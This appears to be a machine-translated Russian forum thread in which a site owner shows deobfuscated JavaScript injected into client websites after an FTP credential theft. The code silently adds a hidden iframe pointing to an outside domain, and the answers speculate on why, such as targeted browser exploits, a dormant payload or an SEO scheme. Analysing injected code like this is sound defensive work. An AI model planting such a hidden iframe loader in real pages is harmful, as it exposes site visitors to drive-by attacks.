Вредоносный JavaScript-код введен - но ничего не делает вредоносного?

Question

Недавно я обнаружил какой-то злой код на некоторых из моих клиентских веб-сайтов.Эти фрагменты были введены на основе PHP и JS и были внедрены из-за того, что троянский вирус зарегистрировал некоторые ftp-учетные данные.Тем не менее, код был запутан, и, как я уже видел (безопасно), он выглядит следующим образом:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src','http://www.bahnmotive.de/index.htm');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Как видите, URL-адрес bahnmotive.de включен на страницу, как и в невидимом iframe.,Этот веб-сайт не содержит никаких вредоносных данных (по крайней мере, больше не сегодня), поэтому я спрашиваю себя (и вас): почему кто-то должен ссылаться на сайт в невидимом фрейме и не совершать других злых дел?Мое первое предположение состоит в том, что есть SEO-агентство, которое пообещало много трафика на веб-сайте своих клиентов bahnmotive.de и осуществило это благодаря этому троянскому вирусу.Может ли это быть?Я провел исследование в Google, но ничего не нашел по этому поводу, поэтому я хотел спросить некоторых профессионалов здесь.Возможно, вы можете указать мне другой форум, где эта тема может быть обсуждена.

Answer 1

Пользовательский агент и плагины могут проверяться по этому URL и эксплойт отправляется только пользователям с уязвимым браузером.

Не стоит недооценивать плохих парней.

Answer 2

Вполне возможно, что веб-страница перехватывает HTTP_REFERER, чтобы гарантировать, что пользователи переходят по ссылке, чтобы скрыть атаку от других посторонних лиц.

Другие соображения:

• он спит и ждет другого времени для активации
• как вы уже сказали, это SEO-строитель, увеличивающий количество внешних ссылок
• веб-сайт в настоящее время активен и делает что-то опасное, чего вы еще не обнаружили (он мог бы скрыть свои следы или использовать разные браузеры)
• кто-то пытался сделать что-то плохое, но потерпел неудачу

Answer 3

Это представление также могло быть сканером, для которого веб-сайты не проверяют правильность строковых данных.Эта информация может быть использована позже в реальной атаке, как говорили другие.

Answer 4

Эксплойт может быть:

• Ограничено по времени: установите для включения в будущем. До этого времени они могли оценивать распространение инфекции, регистрируя адреса
• Ограничено по времени: была инфекция, но теперь она очищена. Это все еще риск, поскольку в будущем злоумышленник может снова разместить вредоносное ПО на этом сервере
• Специфично для браузера: как указывал @kirilloid, легко проверить наличие определенных сигнатур браузера и только серверное вредоносное ПО для браузеров, которые соответствуют

Это может быть не эксплойт как таковой - как вы упомянули в вопросе, это может быть схема SEO для привлечения трафика. Это может не повлиять на вас злонамеренно, но все еще является компромиссом, и JS следует очистить на случай, если он будет развиваться в соответствии с 3 вышеописанными возможностями.